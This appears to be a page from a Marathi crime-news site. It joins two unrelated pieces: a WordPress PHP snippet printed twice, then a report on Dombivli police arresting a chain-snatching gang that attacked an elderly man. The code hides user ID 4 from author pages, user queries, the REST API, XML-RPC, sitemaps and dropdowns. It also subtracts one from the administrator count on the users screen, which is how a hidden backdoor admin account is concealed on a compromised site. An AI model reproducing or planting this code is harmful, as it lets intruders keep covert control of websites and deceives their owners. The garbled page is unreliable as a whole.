add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 4;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 4 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 4;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 4;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 4;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 4 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 4;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 4;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
“ज्येष्ठ नागरिकावर काठीने हल्ला; चेन स्नॅचिंग टोळीचा विष्णुनगर पोलिसांनी केला पर्दाफाश!” - crimeaala.com
डोंबिवली: डोंबिवलीत ज्येष्ठ नागरिकांना लक्ष्य करणाऱ्या चेन स्नॅचिंग टोळीचा विष्णुनगर पोलिसांनी पर्दाफाश करत अवघ्या काही दिवसांत गुन्ह्याची उकल केली आहे. मॉर्निंग वॉकसाठी गेलेल्या ६४ वर्षीय नागरिकाच्या डोक्यात काठीने वार करून गळ्यातील सोन्याची चेन लुटणाऱ्या टोळीतील तीन आरोपींना अटक करण्यात आली असून सहा विधीसंघर्षीत बालकांनाही ताब्यात घेण्यात आले आहे.
२४ मे रोजी पहाटे गावदेवी जेट्टी परिसरात फेरफटका मारत असलेल्या सुगंध मंगल्या म्हात्रे यांच्यावर दोन दुचाकीस्वारांनी हल्ला चढवला. डोक्यात काठीचा फटका मारून त्यांना खाली पाडल्यानंतर गळ्यातील सुमारे २६ ग्रॅम वजनाची सोन्याची चेन हिसकावून आरोपी फरार झाले. या घटनेमुळे परिसरात भीतीचे वातावरण निर्माण झाले होते.
गुन्हा दाखल होताच विष्णुनगर पोलिसांनी सीसीटीव्ही फुटेज, स्थानिक माहिती आणि तांत्रिक तपासाच्या आधारे आरोपींचा माग काढला. तपासादरम्यान एका विधीसंघर्षीत बालकाला ताब्यात घेतल्यानंतर संपूर्ण कट उघडकीस आला. गुन्ह्यापूर्वी रेकी करून ज्येष्ठ नागरिकांना लक्ष्य करण्याची योजना आखण्यात आल्याचे समोर आले.
पोलिसांनी चिंतन नंदा (२०), मोहित जाधव (१९) आणि चोरीचा मुद्देमाल विक्रीस मदत करणारा स्वप्नील भोईर (२७) यांना अटक केली. आरोपींकडून लुटलेली २५.२८० ग्रॅम वजनाची सोन्याची चेन तसेच गुन्ह्यात वापरलेल्या दोन मोटारसायकली जप्त करण्यात आल्या आहेत.
या प्रकरणातील सर्वात धक्कादायक बाब म्हणजे या टोळीतील बहुतांश सदस्य हे १६ ते १८ वयोगटातील विधीसंघर्षीत बालक असल्याचे तपासात निष्पन्न झाले आहे. रेकी करणे, लक्ष्य निवडणे आणि मारहाण करून लूट करणे अशा पद्धतीने त्यांनी गुन्ह्याची अंमलबजावणी केल्याचे उघड झाले आहे.
मा. अपर पोलीस आयुक्त संजय जाधव, पोलीस उप आयुक्त अतुल झेंडे आणि सहाय्यक पोलीस आयुक्त सुहास हेमाडे यांच्या मार्गदर्शनाखाली वरिष्ठ पोलीस निरीक्षक राम चोपडे, पोलीस निरीक्षक गहिणीनाथ गमे, सहायक पोलीस निरीक्षक प्रशांत मोरे, सचिन लोखंडे व त्यांच्या पथकाने ही उल्लेखनीय कारवाई केली.